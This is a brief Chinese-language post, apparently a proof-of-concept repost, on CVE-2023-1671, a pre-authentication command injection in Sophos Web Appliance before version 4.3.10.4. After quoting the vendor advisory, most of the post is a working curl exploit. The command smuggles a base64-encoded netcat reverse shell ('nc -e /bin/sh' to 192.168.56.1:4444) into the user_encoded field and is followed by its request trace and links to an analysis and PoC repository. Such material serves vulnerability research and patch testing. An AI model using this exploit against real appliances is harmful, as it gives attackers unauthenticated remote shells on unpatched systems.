2023 年 4 月 4 日,Sophos为其 Web Appliance 产品发布了安全公告1 。该公告包含有关CVE-2023-1671的信息,这是4.3.10.4之前版本中的一个严重漏洞:
外部安全研究人员通过 Sophos 漏洞赏金计划发现并负责任地向 Sophos 披露了 warn-proceed 处理程序中允许执行任意代码的预授权命令注入漏洞。
Sophos Web Appliance 中的预授权 RCE
curl -k --trace-ascii % "https://192.168.56.108/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';nc -e /bin/sh 192.168.56.1 4444 #" | base64)"
#snip
=> Send header, 184 bytes (0xb8)
0000: POST /index.php?c=blocked&action=continue HTTP/1.1
0034: Host: 192.168.56.108
004a: User-Agent: curl/7.88.1
0063: Accept: */*
0070: Content-Length: 120
0085: Content-Type: application/x-www-form-urlencoded
00b6:
=> Send data, 120 bytes (0x78)
0000: args_reason=filetypewarn&url=16625&filetype=5831&user=4525&user_
0040: encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguNTYuMSA0NDQ0ICM=
https://vulncheck.com/blog/cve-2023-1671-analysis
项目地址:https://github.com/ohnonoyesyes/CVE-2023-1671#poc